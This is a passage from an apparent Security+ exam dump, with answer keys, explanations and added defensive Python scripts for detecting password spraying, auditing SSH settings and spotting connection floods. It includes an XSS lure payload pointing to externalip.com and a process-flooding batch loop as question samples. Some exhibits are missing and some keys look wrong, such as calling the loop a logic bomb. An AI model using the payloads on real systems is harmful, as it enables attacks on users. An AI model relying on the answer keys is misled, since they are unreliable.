account, which trips lockout thresholds quickly, the attacker tries one or a few common
passwords against a long list of usernames, so each account sees only a handful of failures. On
a domain controller this appears as a burst of failed-logon events (Event ID 4625) across many
different accounts from the same source in a short time.
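The distinction above is easy to check in code. The following is an added example, not part of the exam dump: it slides a time window over constructed failed-logon records (simplified 4625/4624 lines; the window and threshold values are assumptions) and labels each source as spraying or brute force from the ratio of failures to distinct accounts.

```python
"""Separate password spraying from classic brute force in failed-logon data.

Added example for the password-spraying question above; it is not part of the
exam dump. The log lines are constructed (simplified Windows 4625/4624 events)
and the window and threshold values are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.5 tries one password against many accounts
# (spraying), 10.0.0.9 hammers a single account (brute force), and
# 10.0.0.77 is a user who mistyped once.
SAMPLE_LOG = """\
2023-03-01T03:00:01 4625 src=10.0.0.5 user=alice
2023-03-01T03:00:02 4625 src=10.0.0.5 user=bob
2023-03-01T03:00:03 4625 src=10.0.0.5 user=carol
2023-03-01T03:00:04 4625 src=10.0.0.5 user=dave
2023-03-01T03:00:05 4625 src=10.0.0.5 user=erin
2023-03-01T03:00:06 4625 src=10.0.0.5 user=frank
2023-03-01T03:00:07 4624 src=10.0.0.5 user=grace
2023-03-01T03:00:08 4625 src=10.0.0.5 user=heidi
2023-03-01T03:05:00 4625 src=10.0.0.9 user=bob
2023-03-01T03:05:01 4625 src=10.0.0.9 user=bob
2023-03-01T03:05:02 4625 src=10.0.0.9 user=bob
2023-03-01T03:05:03 4625 src=10.0.0.9 user=bob
2023-03-01T03:05:04 4625 src=10.0.0.9 user=bob
2023-03-01T03:05:05 4625 src=10.0.0.9 user=bob
2023-03-01T08:15:00 4625 src=10.0.0.77 user=carol
"""


def parse_failures(log):
    """Return (timestamp, source_ip, username) for each 4625 (logon failure) line."""
    events = []
    for line in log.splitlines():
        ts, event_id, src, user = line.split()
        if event_id != "4625":
            continue  # a 4624 success right after a spray is worth its own alert, not counted here
        events.append((datetime.fromisoformat(ts), src.split("=", 1)[1], user.split("=", 1)[1]))
    return events


def classify_sources(events, window=timedelta(minutes=10), min_failures=5):
    """Map source IP -> 'spraying' | 'brute-force' | 'suspicious'.

    For each source, slide `window` over its failures (sorted by time) and keep
    the busiest span. Spraying looks like many distinct accounts with roughly
    one failure each; brute force looks like many failures on one account.
    Sources with fewer than `min_failures` in every span are ignored.
    """
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((ts, user))

    verdicts = {}
    for src, items in by_src.items():
        items.sort()
        busiest = (0, 0)  # (failures, distinct users) in the densest window
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            span = items[start:end + 1]
            if len(span) > busiest[0]:
                busiest = (len(span), len({u for _, u in span}))
        failures, users = busiest
        if failures < min_failures:
            continue
        failures_per_user = failures / users
        if users >= 3 and failures_per_user <= 2:
            verdicts[src] = "spraying"
        elif users == 1:
            verdicts[src] = "brute-force"
        else:
            verdicts[src] = "suspicious"
    return verdicts


def sprayed_accounts(events, src):
    """Accounts a given source touched, i.e. the list to check for lockouts or resets."""
    return sorted({user for _, s, user in events if s == src})


if __name__ == "__main__":
    evs = parse_failures(SAMPLE_LOG)
    for ip, verdict in classify_sources(evs).items():
        print(ip, verdict, sprayed_accounts(evs, ip))
```

The thresholds are the part to tune: a spray tool that waits out the lockout observation window will spread its attempts thinner than ten minutes, so in practice the window is set from the domain's lockout policy rather than hard-coded.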
QUESTION 71
Which of the following cloud models provides clients with servers, storage, and networks but
nothing else?
A. SaaS
B. PaaS
C. IaaS
D. DaaS
Answer: C
QUESTION 72
A network administrator needs to build out a new datacenter, with a focus on resiliency and
uptime. Which of the following would BEST meet this objective? (Choose two.)
A. Dual power supply
B. Off-site backups
C. Automatic OS upgrades
D. NIC teaming
E. Scheduled penetration testing
F. Network-attached storage
Answer: AB
Explanation:
Dual power supplies let a server keep running if one supply, or the circuit feeding it, fails;
with each supply on a separate feed, a single power fault does not take the system down.
Off-site backups keep data restorable even if the datacenter itself is damaged or destroyed,
which matters for every workload but especially for mission-critical applications.
QUESTION 73
A researcher has been analyzing large data sets for the last ten months. The researcher works
with colleagues from other institutions and typically connects via SSH to retrieve additional data.
Historically, this setup has worked without issue, but the researcher recently started getting the
following message:
Which of the following network attacks is the researcher MOST likely experiencing?
A. MAC cloning
B. Evil twin
C. Man-in-the-middle
D. ARP poisoning
Answer: C
QUESTION 74
A network administrator has been alerted that web pages are experiencing long load times. After
determining it is not a routing or DNS issue, the administrator logs in to the router, runs a
command, and receives the following output:
Which of the following is the router experiencing?
A. DDoS attack
B. Memory leak
C. Buffer overflow
D. Resource exhaustion
Answer: D
Explanation:
The router is experiencing resource exhaustion. The command output shows the CPU consistently
busy, with a 1-second average of 99 percent and a 1-minute average of 83 percent, so the router
cannot keep up with the load placed on it and web pages load slowly. A DDoS attack could be what
drives that load, but the output shows only the symptom, not its source; a memory leak would
show up in memory rather than CPU figures, and a buffer overflow is a code defect, not a
sustained load condition.
QUESTION 75
A company provides mobile devices to its users to permit access to email and enterprise
applications. The company recently started allowing users to select from several different vendors
and device models. When configuring the MDM, which of the following is a key security
implication of this heterogeneous device approach?
A. The most common set of MDM configurations will become the effective set of enterprise mobile
security controls.
B. All devices will need to support SCEP-based enrollment; therefore, the heterogeneity of the
chosen architecture may unnecessarily expose private keys to adversaries.
C. Certain devices are inherently less secure than others, so compensatory controls will be needed
to address the delta between device vendors.
D. MDMs typically will not support heterogeneous deployment environments, so multiple MDMs will
need to be installed and configured.
Answer: C
QUESTION 76
A pharmaceutical sales representative logs on to a laptop and connects to the public WiFi to
check emails and update reports. Which of the following would be BEST to prevent other devices
on the network from directly accessing the laptop? (Choose two.)
A. Trusted Platform Module
B. A host-based firewall
C. A DLP solution
D. Full disk encryption
E. A VPN
F. Antivirus software
Answer: BE
QUESTION 77
A company is implementing MFA for all applications that store sensitive data. The IT manager
wants MFA to be non-disruptive and user friendly. Which of the following technologies should the
IT manager use when implementing MFA?
A. One-time passwords
B. Email tokens
C. Push notifications
D. Hardware authentication
Answer: C
QUESTION 78
The CSIRT is reviewing the lessons learned from a recent incident. A worm was able to spread
unhindered throughout the network and infect a large number of computers and servers. Which of
the following recommendations would be BEST to mitigate the impacts of a similar incident in the
future?
A. Install a NIDS device at the boundary.
B. Segment the network with firewalls.
C. Update all antivirus signatures daily.
D. Implement application blacklisting.
Answer: B
QUESTION 79
A company is adopting a BYOD policy and is looking for a comprehensive solution to protect
company information on user devices. Which of the following solutions would BEST support the
policy?
A. Mobile device management
B. Full-device encryption
C. Remote wipe
D. Biometrics
Answer: A
QUESTION 80
A development team employs a practice of bringing all the code changes from multiple team
members into the same development project through automation. A tool is utilized to validate the
code and track source code through version control. Which of the following BEST describes this
process?
A. Continuous delivery
B. Continuous integration
C. Continuous validation
D. Continuous monitoring
Answer: B
QUESTION 81
A cybersecurity administrator needs to add disk redundancy for a critical server. The solution
must have a two-drive failure for better fault tolerance.
Which of the following RAID levels should the administrator select?
A. 0
B. 1
C. 5
D. 6
Answer: D
Explanation:
RAID 6: Because of parity, RAID 6 can withstand two disk failures at one time. This can be
simultaneous failures or during a rebuild another drive can fail and the system will still be
operational.
Source: https://www.promax.com/blog/how-many-drives-can-fail-in-a-raid-configuration
QUESTION 82
Which of the following BEST explains the reason why a server administrator would place a
document named password.txt on the desktop of an administrator account on a server?
A. The document is a honeyfile and is meant to attract the attention of a cyberintruder.
B. The document is a backup file if the system needs to be recovered.
C. The document is a standard file that the OS needs to verify the login credentials.
D. The document is a keylogger that stores all keystrokes should the account be compromised.
Answer: A
QUESTION 83
A security administrator has generated an SSH key pair to authenticate to a new server.
Which of the following should the security administrator do NEXT to use the keys securely for
authentication? Choose 2
A. Install the public key on the server.
B. Install the private key on the server.
C. Encrypt the public key.
D. Encrypt the private key.
E. Install both keys on the server.
F. Securely wipe the certificate signing request.
Answer: AD
Explanation:
The security administrator should install the public key on the server and encrypt the private key.
The public key should be installed on the server. This key will be used to verify the identity of the
client when they attempt to connect to the server. The private key should be kept secret and
stored on the local machine. This is the key that will be used to authenticate to the server.
Encrypting the private key (ssh-keygen does this when a passphrase is supplied) protects it if
the workstation or its backups are stolen.
QUESTION 84
A company has just experienced a malware attack affecting a large number of desktop users.
The antivirus solution was not able to block the malware, but the HIDS alerted to C2 calls as
'Troj.Generic'. Once the security team found a solution to remove the malware, they were able to
remove the malware files successfully, and the HIDS stopped alerting. The next morning,
however, the HIDS once again started alerting on the same desktops, and the security team
discovered the files were back. Which of the following BEST describes the type of malware
infecting this company's network?
A. Trojan
B. Spyware
C. Rootkit
D. Botnet
Answer: A
QUESTION 85
An organization wants to host an externally accessible web server that will not contain sensitive
user information. Any sensitive information will be hosted on file servers. Which of the following is
the BEST architecture configuration for this organization?
A. Host the web server in a DMZ and the file servers behind a firewall
B. Host the web server and the file servers in a DMZ
C. Host the web server behind a firewall and the file servers in a DMZ
D. Host both the web server and file servers behind a firewall
Answer: A
QUESTION 86
Which of the following describes the ability of code to target a hypervisor from inside a guest OS?
A. Fog computing
B. VM escape
C. Software-defined networking
D. Image forgery
E. Container breakout
Answer: B
Explanation:
Virtual machine escape is an exploit in which the attacker runs code on a VM that allows an
operating system running within it to break out and interact directly with the hypervisor.
QUESTION 87
A company posts a sign indicating its server room is under video surveillance. Which of the
following control types is represented?
A. Administrative
B. Detective
C. Technical
D. Deterrent
Answer: D
QUESTION 88
A security administrator has received multiple calls from the help desk about customers who are
unable to access the organization's web server. Upon reviewing the log files. the security
administrator determines multiple open requests have been made from multiple IP addresses,
which is consuming system resources. Which of the following attack types does this BEST
describe?
A. DDoS
B. DoS
C. Zero day
D. Logic bomb
Answer: A
QUESTION 89
A network administrator was provided the following output from a vulnerability scan:
The network administrator has been instructed to prioritize remediation efforts based on overall
risk to the enterprise. Which of the following plugin IDs should be remediated FIRST?
A. 10
B. 11
C. 12
D. 13
E. 14
Answer: D
QUESTION 90
A junior systems administrator noticed that one of two hard drives in a server room had a red
error notification. The administrator removed the hard drive to replace it but was unaware that the
server was configured in an array. Which of the following configurations would ensure no data is
lost?
A. RAID 0
B. RAID 1
C. RAID 2
D. RAID 3
Answer: B
QUESTION 91
A system in the network is used to store proprietary secrets and needs the highest level of
security possible. Which of the following should a security administrator implement to ensure the
system cannot be reached from the Internet?
A. VLAN
B. Air gap
C. NAT
D. Firewall
Answer: B
Explanation:
An air gap, air wall or air gapping is a network security measure employed on one or more
computers to ensure that a secure computer network is physically isolated from unsecured
networks, such as the public Internet or an unsecured local area network. It means a computer or
network has no network interfaces connected to other networks, with a physical or conceptual air
gap, analogous to the air gap used in plumbing to maintain water quality.
QUESTION 92
Which of the following is the BEST use of a WAF?
A. To protect sites on web servers that are publicly accessible
B. To allow access to web services of internal users of the organization.
C. To maintain connection status of all HTTP requests
D. To deny access to all websites with certain contents
Answer: A
QUESTION 93
A transitive trust:
A. is automatically established between a parent and a child.
B. is used to update DNS records.
C. allows access to untrusted domains.
D. can be used in place of a hardware token for logins.
Answer: A
QUESTION 94
A systems administrator wants to disable the use of usernames and passwords for SSH
authentication and enforce key-based authentication. Which of the following should the
administrator do NEXT to enforce this new configuration?
A. Issue a public/private key pair for each user and securely distribute a private key to each
employee.
B. Instruct users on how to create a public/private key pair and install users' public keys on the
server.
C. Disable the username and password authentication and enable TOTP in the sshd.conf file.
D. Change the default SSH port, enable TCP tunneling, and provide a pre-configured SSH client.
Answer: B
Explanation:
Key-based authentication works from the user's public key placed in the server's
authorized_keys file; the private key stays with the user. Generating and handing out private
keys (A) puts the secret in the administrator's hands, TOTP (C) adds a second factor but does
not enforce keys, and changing the port or adding tunneling (D) changes nothing about how users
authenticate.
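Both SSH questions above (installing the public key, then disabling password logons) come down to a handful of sshd_config directives. The following is an added example, not part of the exam dump: it parses a constructed "before" and "after" sshd_config the way sshd does (first occurrence of a directive wins) and reports which key-only requirements are unmet. Directive names and defaults are OpenSSH's; skipping everything after the first Match block is a simplification of my own.

```python
"""Audit an sshd_config for key-only authentication.

Added example covering the SSH key questions above; it is not part of the exam
dump. The two configuration texts are constructed. Directive names and defaults
are those of OpenSSH; the parser follows sshd's first-occurrence-wins rule and,
as a simplification (assumption), stops at the first Match block.
"""
import re

# Constructed: a server still accepting passwords and root password logons.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication yes
"""

# Constructed: the same server after the change. A later duplicate directive
# is ignored by sshd because the first occurrence wins; the Match block only
# restates the global setting for one user.
HARDENED_CONFIG = """\
Port 22
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitEmptyPasswords no
PermitRootLogin prohibit-password
# the next line is a leftover that sshd ignores (first occurrence wins)
PasswordAuthentication yes
Match User backup
    PasswordAuthentication no
"""

# OpenSSH defaults applied when a directive is absent (sshd_config(5)).
DEFAULTS = {
    "pubkeyauthentication": "yes",
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permitemptypasswords": "no",
    "permitrootlogin": "prohibit-password",
}

# What key-only authentication requires.
REQUIRED = {
    "pubkeyauthentication": "yes",
    "passwordauthentication": "no",
    "kbdinteractiveauthentication": "no",
    "permitemptypasswords": "no",
    "permitrootlogin": "prohibit-password",
}

# Older spelling of the same switch; sshd treats them as aliases.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}


def parse_sshd_config(text):
    """Return {directive_lowercase: value} for the global section of the file."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        key = ALIASES.get(parts[0].lower(), parts[0].lower())
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break  # conditional block: outside the scope of this global check
        settings.setdefault(key, value)  # first occurrence wins, as in sshd
    return settings


def audit(text):
    """List (directive, actual, wanted) for every key-only requirement not met."""
    settings = parse_sshd_config(text)
    findings = []
    for key, wanted in REQUIRED.items():
        actual = settings.get(key, DEFAULTS[key]).lower()
        if actual != wanted:
            findings.append((key, actual, wanted))
    return findings


if __name__ == "__main__":
    print("weak:", audit(WEAK_CONFIG))
    print("hardened:", audit(HARDENED_CONFIG))
```

Run it against the live file with `audit(open("/etc/ssh/sshd_config").read())` before restarting sshd, and keep an existing session open while you test a fresh key-based login: with PasswordAuthentication off, a typo in authorized_keys locks everyone out.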
QUESTION 95
Which of the following would MOST likely be a result of improperly configured user accounts?
A. Resource exhaustion
B. Buffer overflow
C. Session hijacking
D. Privilege escalation
Answer: D
QUESTION 96
An organization is concerned about video emissions from users' desktops. Which of the following
is the BEST solution to implement?
A. Screen filters
B. Shielded cables
C. Spectrum analyzers
D. Infrared detection
Answer: A
QUESTION 97
A security administrator receives alerts from the perimeter UTM. Upon checking the logs, the
administrator finds the following output:
Time: 12/25 0300
From Zone: Untrust
To Zone: DMZ
Attacker: externalip.com
Victim: 172.16.0.20
To Port: 80
Action: Alert
Severity: Critical
When examining the PCAP associated with the event, the security administrator finds the
following information:
<script> alert ("Click here for important information regarding your
account! http://externalip.com/account.php"); </script>
Which of the following actions should the security administrator take?
A. Upload the PCAP to the IDS in order to generate a blocking signature to block the traffic.
B. Manually copy the <script> data from the PCAP file and generate a blocking signature in the
HIDS to block the traffic for future events.
C. Implement a host-based firewall rule to block future events of this type from occurring.
D. Submit a change request to modify the XSS vulnerability signature to TCP reset on future
attempts.
Answer: C
Explanation:
The PCAP file shows that the attacker is attempting to exploit a Cross-Site Scripting (XSS)
vulnerability on the victim machine. XSS is a type of vulnerability that allows an attacker to inject
malicious code into a web application. This malicious code can then be executed by the victim
when they visit the web application.
In this case, the attacker is attempting to inject the following malicious code into the web
application:
<script> alert ("Click here for important information regarding your account!
http://externalip.com/account.php"); </script>
The alert() displays a dialog urging the victim to visit the attacker's URL. A victim who follows
it lands on the attacker's site, which can then phish personal information or serve malware.
To prevent future attacks of this type, the security administrator should implement a host-based
firewall rule to block traffic from the attacker's IP address. This will prevent the attacker from
being able to communicate with the victim machine.
QUESTION 98
Which of the following encryption algorithms require one encryption key? (Choose two.)
A. MD5
B. 3DES
C. BCRYPT
D. RC4
E. DSA
Answer: BD
QUESTION 99
A company moved into a new building next to a sugar mill. Cracks have been discovered in the
walls of the server room, which is located on the same side as the sugar mill loading docks. The
cracks are believed to have been caused by heavy trucks. Moisture has begun to seep into the
server room, causing extreme humidification problems and equipment failure. Which of the
following BEST describes the type of threat the organization faces?
A. Foundational
B. Man-made
C. Environmental
D. Natural
Answer: C
Explanation:
Moisture and humidity damaging equipment is an environmental threat; "foundational" is not a
threat category. The trucks that cracked the wall are the cause, but the threat the server room
faces is the environmental condition inside it.
QUESTION 100
Which of the following should a technician use to protect a cellular phone that is needed for an
investigation, to ensure the data will not be removed remotely?
A. Air gap
B. Secure cabinet
C. Faraday cage
D. Safe
Answer: C
QUESTION 101
Which of the following is the MOST likely motivation for a script kiddie threat actor?
A. Financial gain
B. Notoriety
C. Political expression
D. Corporate espionage
Answer: B
QUESTION 102
Moving laterally within a network once an initial exploit is used to gain persistent access for the
purpose of establishing further control of a system is known as:
A. pivoting.
B. persistence.
C. active reconnaissance.
D. a backdoor.
Answer: A
Explanation:
Pivoting is a technique used by attackers to move laterally within a network once they have
gained access to a single system. This allows them to access other systems on the network
without having to re-exploit the initial vulnerability.
QUESTION 103
An organization discovers that unauthorized applications have been installed on
company-provided mobile phones. The organization issues these devices, but some users have
managed to bypass the security controls. Which of the following is the MOST likely issue, and
how can the organization BEST prevent this from happening?
A. The mobile phones are being infected with malware that covertly installs the applications.
Implement full disk encryption and integrity-checking software.
B. Some advanced users are jailbreaking the OS and bypassing the controls.
Implement an MDM solution to control access to company resources.
C. The mobile phones have been compromised by an APT and can no longer be trusted. Scan the
devices for the unauthorized software, recall any compromised devices, and issue completely
new ones.
D. Some advanced users are upgrading the devices' OS and installing the applications.
The organization should create an AUP that prohibits this activity.
Answer: B
QUESTION 104
Which of the following is a valid multifactor authentication combination?
A. OTP token combined with password
B. Strong password and PIN combination
C. OTP token plus smart card
D. Presence detecting facial recognition
Answer: A
QUESTION 105
A security analyst is investigating a call from a user regarding one of the websites receiving a
503: Service Unavailable error. The analyst runs a netstat -an command to discover if
the web server is up and listening. The analyst receives the following output:
TCP  10.1.5.2:80  192.168.2.112:60973  TIME_WAIT
TCP  10.1.5.2:80  192.168.2.112:60974  TIME_WAIT
TCP  10.1.5.2:80  192.168.2.112:60975  TIME_WAIT
TCP  10.1.5.2:80  192.168.2.112:60976  TIME_WAIT
TCP  10.1.5.2:80  192.168.2.112:60977  TIME_WAIT
TCP  10.1.5.2:80  192.168.2.112:60978  TIME_WAIT
Which of the following types of attack is the analyst seeing?
A. Buffer overflow
B. Domain hijacking
C. Denial of service
D. ARP poisoning
Answer: C
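What the analyst reads off the netstat output by eye (one remote host, consecutive source ports, every socket in a transient state) is straightforward to automate. The following is an added example, not part of the exam dump: it parses a constructed netstat -an listing that mirrors the one above plus two legitimate sessions, confirms the service is listening, and flags any remote host holding an unusual number of transient connections. The threshold is an assumption and only IPv4 addresses are handled.

```python
"""Summarise `netstat -an` output per remote host to spot a connection flood.

Added example for the 503/netstat question above; not part of the exam dump.
NETSTAT_SAMPLE is constructed to mirror the lines in the question plus a few
legitimate sockets; the threshold is an assumption and only IPv4 is handled.
"""
from collections import Counter, defaultdict

NETSTAT_SAMPLE = """\
Proto  Local Address      Foreign Address        State
TCP    10.1.5.2:80        192.168.2.112:60973    TIME_WAIT
TCP    10.1.5.2:80        192.168.2.112:60974    TIME_WAIT
TCP    10.1.5.2:80        192.168.2.112:60975    TIME_WAIT
TCP    10.1.5.2:80        192.168.2.112:60976    TIME_WAIT
TCP    10.1.5.2:80        192.168.2.112:60977    TIME_WAIT
TCP    10.1.5.2:80        192.168.2.112:60978    TIME_WAIT
TCP    10.1.5.2:80        10.1.7.40:51022        ESTABLISHED
TCP    10.1.5.2:22        10.1.7.41:55001        ESTABLISHED
TCP    0.0.0.0:80         0.0.0.0:0              LISTENING
"""

# States a flooding client leaves behind: half-open or half-closed sockets.
TRANSIENT = ("TIME_WAIT", "SYN_RECEIVED", "SYN_RECV", "CLOSE_WAIT")


def parse_netstat(text):
    """Return (local_ip, local_port, remote_ip, remote_port, state) for each TCP row."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0].upper() != "TCP":
            continue  # header, UDP rows, blank lines
        lip, lport = parts[1].rsplit(":", 1)
        rip, rport = parts[2].rsplit(":", 1)
        rows.append((lip, int(lport), rip, int(rport), parts[3]))
    return rows


def listening(rows, port):
    """True if a socket is in LISTEN/LISTENING on `port`, i.e. the service is up."""
    return any(lport == port and state.startswith("LISTEN") for _, lport, _, _, state in rows)


def by_remote(rows, local_port):
    """remote_ip -> Counter of TCP states for connections to `local_port`."""
    table = defaultdict(Counter)
    for _, lport, rip, _, state in rows:
        if lport == local_port:
            table[rip][state] += 1
    return table


def flooders(rows, local_port, threshold=5, states=TRANSIENT):
    """Remote IPs holding at least `threshold` connections to local_port in transient states."""
    result = {}
    for rip, counts in by_remote(rows, local_port).items():
        n = sum(counts[s] for s in states)
        if n >= threshold:
            result[rip] = n
    return result


def sequential_source_ports(rows, remote_ip):
    """True if the remote side's ports step by one: a single scripted client, not many users."""
    ports = sorted(rport for _, _, rip, rport, _ in rows if rip == remote_ip)
    return len(ports) > 1 and ports == list(range(ports[0], ports[0] + len(ports)))


if __name__ == "__main__":
    rows = parse_netstat(NETSTAT_SAMPLE)
    print("port 80 listening:", listening(rows, 80))
    for ip, n in flooders(rows, 80).items():
        print(ip, n, "transient sockets; sequential ports:", sequential_source_ports(rows, ip))
```

On a real server the interesting numbers are in the thousands, not six, and the source is usually many addresses (a DDoS) rather than one, so the per-remote table is what you sort first; a single internal address such as 192.168.2.112 points at a misbehaving client or an internal host under someone else's control rather than an Internet-scale attack.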
QUESTION 106
Which of the following serves to warn users against downloading and installing pirated software
on company devices?
A. AUP
B. NDA
C. ISA
D. BPA
Answer: A
QUESTION 107
An employee opens a web browser and types a URL into the address bar. Instead of reaching the
requested site, the browser opens a completely different site. Which of the following types of
attacks have MOST likely occurred? (Choose two.)
A. DNS hijacking
B. Cross-site scripting
C. Domain hijacking
D. Man-in-the-browser
E. Session hijacking
Answer: AD
QUESTION 108
A company is experiencing an increasing number of systems that are locking up on Windows
startup. The security analyst clones a machine, enters into safe mode, and discovers a file in the
startup process that runs Wstart.bat.
@echo off
:asdhbawdhbasdhbawdhb
start notepad.exe
start notepad.exe
start calculator.exe
start calculator.exe
goto asdhbawdhbasdhbawdhb
Given the file contents and the system’s issues, which of the following types of malware is
present?
A. Rootkit
B. Logic bomb
C. Worm
D. Virus
Answer: B
QUESTION 109
Which of the following attacks can be mitigated by proper data retention policies?
A. Dumpster diving
B. Man-in-the-browser
C. Spear phishing
D. Watering hole
Answer: A
Explanation:
Dumpster diving risks would be mitigated by proper data sanitization policies... isn't data
retention about how we keep data secure through backups, legal hold, etc.?
QUESTION 110
A company employee recently retired, and there was a schedule delay because no one was
capable of filling the employee's position. Which of the following practices would BEST help to
prevent this situation in the future?
A. Mandatory vacation
B. Separation of duties
C. Job rotation
D. Exit interviews
Answer: C
QUESTION 111
During a security audit of a company's network, unsecure protocols were found to be in use.
A network administrator wants to ensure browser-based access to company switches is using the
most secure protocol. Which of the following protocols should be implemented?
A. SSH2
B. TLS1.2
C. SSL1.3
D. SNMPv3
Answer: B
QUESTION 112
A healthcare company is revamping its IT strategy in light of recent regulations. The company is
concerned about compliance and wants to use a pay-per-use model.
Which of the following is the BEST solution?
A. On-premises hosting
B. Community cloud
C. Hosted infrastructure
D. Public SaaS
Answer: D
Explanation:
"Pay per use" in this context works like an electric bill: the customer pays for the amount of
service actually consumed. That metering model is characteristic of public SaaS, where the
provider hosts the software and bills by usage.
https://1c-dn.com/1c_enterprise/public/
QUESTION 113
Which of the following represents a multifactor authentication system?
A. An iris scanner coupled with a palm print reader and fingerprint scanner with liveness detection
B. A secret passcode that prompts the user to enter a secret key if entered correctly
C. A digital certificate on a physical token that is unlocked with a secret passcode
D. A one-time password token combined with a proximity badge
Answer: C
QUESTION 114
A preventive control differs from a compensating control in that a preventive control is:
A. put in place to mitigate a weakness in a user control.
B. deployed to supplement an existing control that is EOL.
C. relied on to address gaps in the existing control structure.
D. designed to specifically mitigate a risk.
Answer: D
Explanation:
Preventative controls are designed to be implemented prior to a threat event and reduce and/or
avoid the likelihood and potential impact of a successful threat event. Examples of preventative
controls include policies, standards, processes, procedures, encryption, firewalls, and physical
barriers.
QUESTION 115
The exploitation of a buffer-overrun vulnerability in an application will MOST likely lead
to:
A. arbitrary code execution.
B. resource exhaustion.
C. exposure of authentication credentials.
D. dereferencing of memory pointers.
Answer: A
QUESTION 116
The president of a company that specializes in military contracts receives a request for an
interview. During the interview, the reporter seems more interested in discussing the president's
family life and personal history than the details of a recent company success. Which of the
following security concerns is this MOST likely an example of?
A. Insider threat
B. Social engineering
C. Passive reconnaissance
D. Phishing
Answer: B
QUESTION 117
Which of the following is an example of federated access management?
A. Windows passing user credentials on a peer-to-peer network
B. Applying a new user account with a complex password
C. Implementing an IAM framework for network access
D. Using a popular website login to provide access to another website
Answer: D
QUESTION 118
A company network is currently under attack. Although security controls are in place to stop the
attack, the security administrator needs more information about the types of attacks being used.
Which of the following network types would BEST help the administrator gather this information?
A. DMZ
B. Guest network
C. Ad hoc
D. Honeynet
Answer: D
QUESTION 119
An organization's policy requires users to create passwords with an uppercase letter, lowercase
letter, number, and symbol. This policy is enforced with technical controls, which also prevent
users from using any of their previous 12 passwords. The organization does not use single
sign-on, nor does it centralize storage of passwords.
The incident response team recently discovered that passwords for one system were
compromised. Passwords for a completely separate system have NOT been compromised, but
unusual login activity has been detected for that separate system. Account login has been
detected for users who are on vacation.
Which of the following BEST describes what is happening?
A. Some users are meeting password complexity requirements but not password length
requirements.
B. The password history enforcement is insufficient, and old passwords are still valid across many
different systems.
C. Some users are reusing passwords, and some of the compromised passwords are valid on
multiple systems.
D. The compromised password file has been brute-force hacked, and the complexity requirements
are not adequate to mitigate this risk.
Answer: C
QUESTION 120
A company recently implemented a new security system. In the course of configuration, the
security administrator adds the following entry:
#Whitelist
USB\VID13FE&PID_4127&REV_0100
Which of the following security technologies is MOST likely being configured?
A. Application whitelisting
B. HIDS
C. Data execution prevention
D. Removable media control
Answer: D
QUESTION 121
A security analyst needs to be proactive in understanding the types of attacks that could potentially
target the company's executives.
Which of the following intelligence sources should the security analyst review?
A. Vulnerability feeds
B. Trusted automated exchange of indicator information
C. Structured threat information expression
D. Industry information-sharing and collaboration groups
Answer: D
QUESTION 122
A cybersecurity department purchased a new PAM solution. The team is planning to randomize
the service account credentials of the Windows server first.
Which of the following would be the BEST method to increase the security on the Linux server?
A. Randomize the shared credentials.
B. Use only guest accounts to connect.
C. Use SSH keys and remove generic passwords.
D. Remove all user accounts.
Answer: C
QUESTION 123
A security audit has revealed that a process control terminal is vulnerable to malicious users
installing and executing software on the system. The terminal is beyond end-of-life support and
cannot be upgraded, so it is placed on a protected network segment.
Which of the following would be MOST effective to implement to further mitigate the reported
vulnerability?
A. DNS sinkholing
B. DLP rules on the terminal
C. An IP blacklist
D. Application whitelisting
Answer: D
QUESTION 124
An organization has decided to host its web application and database in the cloud.
Which of the following BEST describes the security concerns for this decision?
A. Access to the organization's servers could be exposed to other cloud-provider clients
B. The cloud vendor is a new attack vector within the supply chain
C. Outsourcing the code development adds risk to the cloud provider
D. Vendor support will cease when the hosting platforms reach EOL.
Answer: B
QUESTION 125
A user reports constant lag and performance issues with the wireless network when working at a
local coffee shop.
A security analyst walks the user through an installation of Wireshark and gets a five-minute pcap
to analyze. The analyst observes the following output:
Which of the following attacks does the analyst MOST likely see in this packet capture?
A. Session replay
B. Evil twin
C. Bluejacking
D. ARP poisoning
Answer: B
Explanation:
One of the main purposes of deauthentication used in the hacking community is to force clients to
connect to an evil twin access point which then can be used to capture network packets
transferred between the client and the access point.
https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack
QUESTION 126
A user recently attended an exposition and received some digital promotional materials.
The user later noticed blue boxes popping up and disappearing on the computer, and reported
receiving several spam emails, which the user did not open.
Which of the following is MOST likely the cause of the reported issue?
A. There was a drive-by download of malware
B. The user installed a cryptominer
C. The OS was corrupted
D. There was malicious code on the USB drive
Answer: D
QUESTION 127
A security analyst is performing a packet capture on a series of SOAP HTTP requests for a
security assessment.
The analyst redirects the output to a file. After the capture is complete, the analyst needs to review
the first transactions quickly and then search the entire series of requests for a particular string.
Which of the following would be BEST to use to accomplish the task? (Choose two.)
A. head
B. tcpdump
C. grep
D. tail
E. curl
F. openssl
G. dd
Answer: AC
Explanation:
"Head" to display the first transactions.
"grep" to search for a specific string.
QUESTION 128
The Chief Executive Officer (CEO) of an organization would like staff members to have the
flexibility to work from home anytime during business hours, including during a pandemic or crisis.
However, the CEO is concerned that some staff members may take advantage of the
flexibility and work from high-risk countries while on holiday, or outsource work to a third-party
organization in another country. The Chief Information Officer (CIO) believes the company can
implement some basic controls to mitigate the majority of the risk.
Which of the following would be BEST to mitigate the CEO's concern? (Choose two.)
A. Geolocation
B. Time-of-day restrictions
C. Certificates
D. Tokens
E. Geotagging
F. Role-based access controls
Answer: AB
Explanation:
Geolocation reveals more specific data about a user's location, such as their current city or state.
Time-of-day restrictions prevent someone in another time zone from performing outsourced work.
Geotagging labels your location for the purpose of adding geographical details to a photo, a video,
or any media in the form of metadata.
QUESTION 129
A company is implementing a DLP solution on the file server. The file server has PII, financial
